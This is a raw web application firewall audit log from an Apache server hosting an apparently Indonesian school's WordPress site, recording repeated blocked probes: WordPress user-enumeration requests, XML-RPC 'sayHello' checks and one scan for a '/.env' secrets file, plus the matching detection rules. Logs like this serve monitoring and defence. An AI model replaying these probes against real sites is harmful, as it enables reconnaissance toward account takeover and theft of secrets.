charset=iso-8859-1 --79ec6a34-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746436597475963 3129 (- - -) Stopwatch2: 1746436597475963 3129; combined=1436, p1=439, p2=966, p3=0, p4=0, p5=30, sr=68, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --79ec6a34-Z-- --0fca7367-A-- [05/May/2025:16:16:40 +0700] aBiB-ARwKNFSM6B7_LZ1JwAAAIE 103.236.140.4 42468 103.236.140.4 8181 --0fca7367-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.83.127 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.83.127 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0fca7367-C-- demo.sayHello --0fca7367-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0fca7367-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746436600540079 5686 (- - -) Stopwatch2: 1746436600540079 5686; combined=4573, p1=565, p2=3670, p3=34, p4=46, p5=145, sr=72, sw=113, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0fca7367-Z-- --36bddf77-A-- [05/May/2025:16:28:34 +0700] aBiEwgRwKNFSM6B7_LZ3oQAAAIc 103.236.140.4 53472 103.236.140.4 8181 --36bddf77-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.97 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --36bddf77-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --36bddf77-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746437314563402 3583 (- - -) Stopwatch2: 1746437314563402 3583; combined=1526, p1=512, p2=975, p3=0, p4=0, p5=38, sr=80, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --36bddf77-Z-- --0d43d72f-A-- [05/May/2025:16:28:37 +0700] aBiExQRwKNFSM6B7_LZ3ogAAAJU 103.236.140.4 53476 103.236.140.4 8181 --0d43d72f-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.97 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.97 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --0d43d72f-C-- demo.sayHello --0d43d72f-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d43d72f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746437317331472 5220 (- - -) Stopwatch2: 1746437317331472 5220; combined=3961, p1=449, p2=3285, p3=36, p4=32, p5=92, sr=68, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d43d72f-Z-- --7ebcec2d-A-- [05/May/2025:16:34:15 +0700] aBiGFwRwKNFSM6B7_LZ4GAAAAII 103.236.140.4 55680 103.236.140.4 8181 --7ebcec2d-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.43 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --7ebcec2d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7ebcec2d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746437655542298 2591 (- - -) Stopwatch2: 1746437655542298 2591; combined=1244, p1=394, p2=820, p3=0, p4=0, p5=30, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7ebcec2d-Z-- --a8ac1b5c-A-- [05/May/2025:16:34:18 +0700] aBiGGk2V_h1VFAgsfgZGjwAAAAk 103.236.140.4 55722 103.236.140.4 8181 --a8ac1b5c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.233.75.43 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.233.75.43 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --a8ac1b5c-C-- demo.sayHello --a8ac1b5c-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --a8ac1b5c-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746437658341829 6575 (- - -) Stopwatch2: 1746437658341829 6575; combined=4733, p1=674, p2=3779, p3=32, p4=36, p5=123, sr=128, sw=89, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a8ac1b5c-Z-- --40670f41-A-- [05/May/2025:16:41:33 +0700] aBiHzU2V_h1VFAgsfgZG8QAAAAE 103.236.140.4 57326 103.236.140.4 8181 --40670f41-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --40670f41-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --40670f41-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. 
[file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746438093088341 2458 (- - -) Stopwatch2: 1746438093088341 2458; combined=1079, p1=361, p2=682, p3=0, p4=0, p5=36, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --40670f41-Z-- --ebeb0076-A-- [05/May/2025:16:41:35 +0700] aBiHzwRwKNFSM6B7_LZ4eQAAAIM 103.236.140.4 57330 103.236.140.4 8181 --ebeb0076-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.95.84 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.95.84 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --ebeb0076-C-- demo.sayHello --ebeb0076-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --ebeb0076-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. 
Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746438095932332 6019 (- - -) Stopwatch2: 1746438095932332 6019; combined=4322, p1=589, p2=3500, p3=35, p4=35, p5=96, sr=117, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ebeb0076-Z-- --f8d6045a-A-- [05/May/2025:17:11:54 +0700] aBiO6k2V_h1VFAgsfgZH8gAAABg 103.236.140.4 59044 103.236.140.4 8181 --f8d6045a-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 146.190.240.206 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 146.190.240.206 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --f8d6045a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f8d6045a-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1746439914271182 747 (- - -) Stopwatch2: 1746439914271182 747; combined=358, p1=323, p2=0, p3=0, p4=0, p5=35, sr=114, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f8d6045a-Z-- --af4ef63a-A-- [05/May/2025:18:11:07 +0700] aBicy02V_h1VFAgsfgZLwwAAAAc 103.236.140.4 47038 103.236.140.4 8181 --af4ef63a-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.178 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --af4ef63a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --af4ef63a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443467863779 9607 (- - -) Stopwatch2: 1746443467863779 9607; combined=6423, p1=1729, p2=4639, p3=0, p4=0, p5=55, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --af4ef63a-Z-- --dce8fb12-A-- [05/May/2025:18:11:10 +0700] aBiczgRwKNFSM6B7_LZ8DQAAAIQ 103.236.140.4 47058 103.236.140.4 8181 --dce8fb12-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.178 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.178 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --dce8fb12-C-- demo.sayHello --dce8fb12-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --dce8fb12-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443470707536 6119 (- - -) Stopwatch2: 1746443470707536 6119; combined=4739, p1=595, p2=3832, p3=38, p4=44, p5=163, sr=116, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --dce8fb12-Z-- --bd2f7e67-A-- [05/May/2025:18:11:38 +0700] aBic6k2V_h1VFAgsfgZL4AAAAAI 103.236.140.4 47378 103.236.140.4 8181 --bd2f7e67-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --bd2f7e67-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --bd2f7e67-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443498077236 2731 (- - -) Stopwatch2: 1746443498077236 2731; combined=1263, p1=416, p2=818, p3=0, p4=0, p5=29, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --bd2f7e67-Z-- --982f2418-A-- [05/May/2025:18:11:40 +0700] aBic7IZWvR7-42f6JrDg2QAAAMw 103.236.140.4 47410 103.236.140.4 8181 --982f2418-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.176.189 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.176.189 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --982f2418-C-- demo.sayHello --982f2418-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --982f2418-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443500813029 6519 (- - -) Stopwatch2: 1746443500813029 6519; combined=4759, p1=660, p2=3857, p3=32, p4=37, p5=101, sr=131, sw=72, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --982f2418-Z-- --f6e9be35-A-- [05/May/2025:18:16:14 +0700] aBid_oZWvR7-42f6JrDhhwAAAM4 103.236.140.4 50194 103.236.140.4 8181 --f6e9be35-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.92 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f6e9be35-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f6e9be35-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443774824930 2623 (- - -) Stopwatch2: 1746443774824930 2623; combined=1270, p1=447, p2=791, p3=0, p4=0, p5=31, sr=104, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f6e9be35-Z-- --c144315a-A-- [05/May/2025:18:16:17 +0700] aBieAQRwKNFSM6B7_LZ8vwAAAII 103.236.140.4 50218 103.236.140.4 8181 --c144315a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 154.94.14.92 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 154.94.14.92 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c144315a-C-- demo.sayHello --c144315a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c144315a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443777596113 6804 (- - -) Stopwatch2: 1746443777596113 6804; combined=4787, p1=624, p2=3906, p3=46, p4=43, p5=99, sr=76, sw=69, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c144315a-Z-- --cab3db7e-A-- [05/May/2025:18:19:37 +0700] aBieyYZWvR7-42f6JrDiOQAAAMY 103.236.140.4 52228 103.236.140.4 8181 --cab3db7e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.184 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --cab3db7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cab3db7e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1746443977879945 3401 (- - -) Stopwatch2: 1746443977879945 3401; combined=1435, p1=496, p2=902, p3=0, p4=0, p5=37, sr=95, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cab3db7e-Z-- --4549af1a-A-- [05/May/2025:18:19:40 +0700] aBiezPZJDMuQndL03JMwsgAAAEk 103.236.140.4 52268 103.236.140.4 8181 --4549af1a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.105.184 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.105.184 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4549af1a-C-- demo.sayHello --4549af1a-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4549af1a-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1746443980936569 6157 (- - -) Stopwatch2: 1746443980936569 6157; combined=4506, p1=543, p2=3711, p3=31, p4=36, p5=110, sr=73, sw=75, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
